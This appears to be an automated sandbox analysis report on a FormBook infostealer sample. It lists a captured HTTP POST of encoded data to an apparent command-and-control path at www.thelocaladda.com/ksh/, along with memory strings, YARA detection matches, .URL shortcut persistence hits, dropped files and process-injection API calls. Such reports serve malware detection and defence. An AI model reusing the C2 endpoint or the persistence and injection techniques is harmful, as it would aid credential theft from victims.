        Source: unknownHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Detected FormBook malwareShow sources
        Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logri.iniJump to dropped file
        Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logrv.iniJump to dropped file
        Malicious sample detected (through community Yara rule)Show sources
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419C90 NtCreateFile,9_2_00419C90
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419D40 NtReadFile,9_2_00419D40
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419DC0 NtClose,9_2_00419DC0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419E70 NtAllocateVirtualMemory,9_2_00419E70
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419C8A NtCreateFile,9_2_00419C8A
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419D3A NtReadFile,9_2_00419D3A
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419DBA NtClose,9_2_00419DBA
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419E6A NtAllocateVirtualMemory,9_2_00419E6A
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A00 NtProtectVirtualMemory,LdrInitializeThunk,9_2_031A9A00
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A20 NtResumeThread,LdrInitializeThunk,9_2_031A9A20
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A50 NtCreateFile,LdrInitializeThunk,9_2_031A9A50
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_031A9910
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A99A0 NtCreateSection,LdrInitializeThunk,9_2_031A99A0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9840 NtDelayExecution,LdrInitializeThunk,9_2_031A9840
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_031A9860
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A98F0 NtReadVirtualMemory,LdrInitializeThunk,9_2_031A98F0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9710 NtQueryInformationToken,LdrInitializeThunk,9_2_031A9710
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9780 NtMapViewOfSection,LdrInitializeThunk,9_2_031A9780
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A97A0 NtUnmapViewOfSection,LdrInitializeThunk,9_2_031A97A0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_031A9660
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_031A96E0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9540 NtReadFile,LdrInitializeThunk,9_2_031A9540
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A95D0 NtClose,LdrInitializeThunk,9_2_031A95D0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9B00 NtSetValueKey,9_2_031A9B00
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AA3B0 NtGetContextThread,9_2_031AA3B0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A10 NtQuerySection,9_2_031A9A10
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A80 NtOpenDirectoryObject,9_2_031A9A80
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9950 NtQueueApcThread,9_2_031A9950
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A99D0 NtCreateProcessEx,9_2_031A99D0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9820 NtEnumerateKey,9_2_031A9820
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AB040 NtSuspendThread,9_2_031AB040
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A98A0 NtWriteVirtualMemory,9_2_031A98A0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AA710 NtOpenProcessToken,9_2_031AA710
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9730 NtQueryVirtualMemory,9_2_031A9730
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9770 NtSetInformationFile,9_2_031A9770
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AA770 NtOpenThread,9_2_031AA770
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9760 NtOpenProcess,9_2_031A9760
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9FE0 NtCreateMutant,9_2_031A9FE0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9610 NtEnumerateValueKey,9_2_031A9610
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9650 NtQueryValueKey,9_2_031A9650
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9670 NtQueryInformationProcess,9_2_031A9670
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A96D0 NtCreateKey,9_2_031A96D0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AAD30 NtSetContextThread,9_2_031AAD30
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9520 NtWaitForSingleObject,9_2_031A9520
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9560 NtWriteFile,9_2_031A9560
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A95F0 NtQueryInformationFile,9_2_031A95F0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_004010309_2_00401030
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041D97B9_2_0041D97B
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DADA9_2_0041DADA
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DBC09_2_0041DBC0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00402D909_2_00402D90
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DDA49_2_0041DDA4
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041E6549_2_0041E654
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DE0B9_2_0041DE0B
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00409E2E9_2_00409E2E
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00409E309_2_00409E30
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041CEE39_2_0041CEE3
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041CEE69_2_0041CEE6
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DEFF9_2_0041DEFF
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DF1F9_2_0041DF1F
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00402FB09_2_00402FB0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0319EBB09_2_0319EBB0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0316F9009_2_0316F900
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031841209_2_03184120
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_032210029_2_03221002
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0317B0909_2_0317B090
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031920A09_2_031920A0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03186E309_2_03186E30
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03160D209_2_03160D20
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03231D559_2_03231D55
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031925819_2_03192581
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0317D5E09_2_0317D5E0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0317841F9_2_0317841F
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB019_3_04B26EB0
        Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 50484224 appears 50 times
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: String function: 0231C890 appears 48 times
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 0316B150 appears 32 times
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: String function: 04B2B4A4 appears 32 times
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: String function: 04B23AF4 appears 40 times
        Source: Mqbmupv_Signed_.exeStatic PE information: invalid certificate
        Source: Mqbmupv_Signed_.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Mqbmupv_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Mqbmnet.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Mqbmnet.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
        Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
